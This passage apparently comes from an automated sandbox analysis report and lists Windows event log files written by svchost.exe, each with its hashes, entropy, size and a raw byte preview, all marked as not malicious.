                                                SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                Malicious:false
                                                Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.9223892466691472
                                                Encrypted:false
                                                SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                Malicious:false
                                                Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.838106263184782
                                                Encrypted:false
                                                SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                MD5:A2D41740C1BAF781019F282E37288DDF
                                                SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                Malicious:false
                                                Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.634418630947688
                                                Encrypted:false
                                                SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                Malicious:false
                                                Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.0646587531847893
                                                Encrypted:false
                                                SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                Malicious:false
                                                Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.4364303862010575
                                                Encrypted:false
                                                SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                Malicious:false
                                                Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.0631557320109892
                                                Encrypted:false
                                                SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                Malicious:false
                                                Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.4467272005363894
                                                Encrypted:false
                                                SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                MD5:155681C222D825199B738E8DEC707DC8
                                                SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                Malicious:false
                                                Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.156155224835584
                                                Encrypted:false
                                                SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                Malicious:false
                                                Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.9197999988543422
                                                Encrypted:false
                                                SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                Malicious:false
                                                Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                Category:dropped
                                                Size (bytes):76040
                                                Entropy (8bit):4.552038999861418
                                                Encrypted:false
                                                SSDEEP:768:iLjpPv++M48PFVbUa+54cpLjpPv++M48PFVbUa+54cyY20sMY3Dp13/n/ydIxm6c:3U
                                                MD5:90F4DEFFDCF0102D864E128B6600A92F
                                                SHA1:3BDCCD2E88E4A71BAD80A398E44B1A368B7E29D4
                                                SHA-256:D7744E50FFE6DA4603523FD2F9A806E0ED6E0A44584636CBAC11DA4CE9CB8F4B
                                                SHA-512:DF8E421377210FA318157573ABCFB7C4162AE85A1AA87A9224A6C84756963CBA24B97653DC7FFCFD8D0B0C9A569C4D4A279BEC4AA182B1532140C816D9A6E8A6
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(..j.$.........................................................................................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):5.718426658668259
                                                Encrypted:false
                                                SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                MD5:8630011707C7BFBCECC0A9430637802E
                                                SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                Malicious:false
                                                Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9963080376858662
                                                Encrypted:false
                                                SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                Malicious:false
                                                Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.076996627399968
                                                Encrypted:false
                                                SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                Malicious:false
                                                Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):83408
                                                Entropy (8bit):3.451882343754919
                                                Encrypted:false
                                                SSDEEP:384:g+ILnEICI0zISIaI4WiI7AIb+qIpIRIRIwIdIAIcRIOIlIzIhINIDvUIJIshhDIJ:gRY7hZxGp9bY
                                                MD5:B5AE54306655A4C81825846B0A1B10D1
                                                SHA1:E0EDF8F9094D73120CB6BA533B6F534A60FEE80B
                                                SHA-256:F466BB91A2523DC944C90E17E4C287E5DA4708818CBBDD2666EB868DB5BD8DFB
                                                SHA-512:158720B128FFC2383B5F448029B1781ED4F71F5FFBE4A111353067D62A34BB34C1F422DC1801798B405A9B61EA9CFBC34153AD64F5162E751A5C4A351FABA126
                                                Malicious:false
                                                Preview:ElfChnk.T...............T...................P...h.............................................................................R........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......z........6xQ...............a..............................................................,.......D.....!........... ....@.6xQ....@..^<.....fX........p...z....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l........n..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.801423310886069
                                                Encrypted:false
                                                SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                Malicious:false
                                                Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.996272372482282
                                                Encrypted:false
                                                SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                Malicious:false
                                                Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                Category:dropped
                                                Size (bytes):68576
                                                Entropy (8bit):3.7348507670154945
                                                Encrypted:false
                                                SSDEEP:768:pJIutDBjV8k+u7eytHpoVWWL07SZRcZv76NcRUjGHzLKvc90XKcZv76NcRkpyLjh:YutDBjV8k+u7BtHpoVW
                                                MD5:2B9F0615D6225AEA9921D1F133F40C3D
                                                SHA1:43570BF64C45D97707AAB329907418549B0732FE
                                                SHA-256:82711A5681382076C98111C2BDCAF45D4B68BD5C96BD66818849419461B2CEF8
                                                SHA-512:812D4B8D1B3200B650107B76FEDA4D54351FD871FF93C98C8F99E875217C92FF9616AB8C2F4CC9DD9646D1250688C72DE5C0B7FB4E2BAF67D19BA49966941712
                                                Malicious:false
                                                Preview:ElfChnk.................O.......Q...........x.......-.........................................................................E:................ ...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..P...O........e+Y..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.741691431664288
                                                Encrypted:false
                                                SSDEEP:768:xkN2cTOsK4TcCC/8+XuCqabvY7NrjzDbRt:zcis7Tc8+XuCqabvY53R
                                                MD5:7B933E51961B1AEB3462112F80596FDF
                                                SHA1:17D8FF8EA9032BF104353DFB6840CFE484D51BF4
                                                SHA-256:AB3F0A1F98A9E55FFFEF021F79686933AC581E4FF06DB2328ECD36FE4F3A1CBE
                                                SHA-512:5E997E1B428FFA0B96EDF7C4AD3CCF413D31E557252368356D8BA2F7673D40B35A2CFFF19625234789C226B40FF72B3D5F9BF2036164CF7A51B2199A8BD1431C
                                                Malicious:false
                                                Preview:ElfChnk.........................................p...S-......................................................................{4.e................l...........................=...........................................................................................................................f...............?...........................m...................M...F.......................E................................M..&...g`..g5......................o]...........X...Z..GP...............s......od......_i..**..P............%.o..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.7590316238843728
                                                Encrypted:false
                                                SSDEEP:384:IhP8o8Z85848V8M8g8D8R8E8T8h8p8TtP8sU8:Ic
                                                MD5:B074238315662886E2BD70106D08A747
                                                SHA1:5ADA158D19401565E76349FCA97489E9FB9BFA36
                                                SHA-256:53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
                                                SHA-512:9D35DC04CCE95541551254BCBB00B0E2E0860D9B6F69D40FBC829DA31FC3AC43690A049A432BA4D43315B80675143A6AA02C57484E7903845010A5AD9EC92D6D
                                                Malicious:false
                                                Preview:ElfChnk.........................................0!....H.......................................................................j........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.7512152679236914
                                                Encrypted:false
                                                SSDEEP:1536:1XhKUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:1XgnS
                                                MD5:7A1F6EC8C2043FA2F06ED51CE0CC4DFD
                                                SHA1:3FF69E1558AB7143BB157A9088287D79FBF7AF30
